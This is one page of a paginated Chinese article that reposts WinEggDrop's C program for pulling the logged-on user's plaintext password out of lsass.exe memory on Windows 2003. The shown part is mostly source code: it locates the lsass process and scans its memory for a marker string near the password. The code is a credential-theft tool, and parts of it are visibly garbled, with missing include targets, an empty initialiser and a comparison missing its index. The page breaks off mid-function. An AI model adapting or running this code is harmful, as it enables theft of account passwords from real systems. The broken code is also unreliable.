在win 2003中得到登陆用户的密码的三大妙法
  • 作者:木木
  • 时间:2022-12-24

  代码: //********************************************************************************

  // Version: V1.0

  // Coder: WinEggDrop

  // Date Release: 12/15/2004

  // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method

  // Used Is Pretty Unwise,But This May Be The Only Way To Review The

  // Logon User's Password On windows 2003.

  // Test PlatForm: windows 2003

  // Compiled On: VC++ 6.0

  //********************************************************************************

  #include

  #include

  #include

  #define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

  char Password[MAX_PATH] = ; // Store The Found Password

  // Function ProtoType Declaration

  //------------------------------------------------------------------------------------------------------

  BOOL FindPassword(DWORD PID);

  int Search(char *Buffer,const UINT nSize);

  DWORD GetLsassPID();

  BOOL Is2003();

  //------------------------------------------------------------------------------------------------------

  // End Of Fucntion ProtoType Declaration

  int main()

  {

  DWORD PID = 0;

  printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

  if (!Is2003()) // Check Out If The Box Is 2003

  {

  printf("The Program Can't Only Run On windows 2003 Platform\n");

  return -1;

  }

  PID = GetLsassPID(); // Get The Lsass.exe PID

  if (PID == 0) // Fail To Get PID If Returning Zerom

  {

  return -1;

  }

  FindPassword(PID); // Find The Password From Lsass.exe Memory

  return 0;

  }

  // End main()

  //------------------------------------------------------------------------------------

  // Purpose: Search The Memory & Try To Get The Password

  // Return Type: int

  // Parameters:

  // In: char *Buffer --> The Memory Buffer To Search

  // Out: const UINT nSize --> The Size Of The Memory Buffer

  // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",

  // Since The Password Is Near The Above Location,But It's Not Always True That

  // We Will Find The Magic String,Or Even We Find It,The Password May Be Located

  // At Some Other Place.We Only Look For Luck

  //------------------------------------------------------------------------------------

  int Search(char *Buffer,const UINT nSize)

  {

  UINT OffSet = 0;

  UINT i = 0;

  UINT j = 0 ;

  UINT Count = 0;

  if (Buffer == NULL)

  {

  return -1;

  }

  for (i = 0 ; i < nSize ; i++)

  {

  /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word

  Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate

  The Magic String,We Have To Do It Manually And Slowly

  */

  if (Buffer == 'L')

  {

  OffSet = 0;

  if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)

  {

  OffSet += strlen("LocalSystem") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)

  {

  OffSet += strlen("Remote") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)

  {

  OffSet += strlen("Procedure") + 1;

  if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)

  {

  i += OffSet;

  break;

  }

  }

  }

  }

  }

  }

  if (i < nSize)

  {

  ZeroMemory(Password,sizeof(Password));

  for (; i < nSize ; i++)

 2/3   首页 上一页 1 2 3 下一页 尾页
相关推荐
用户评论区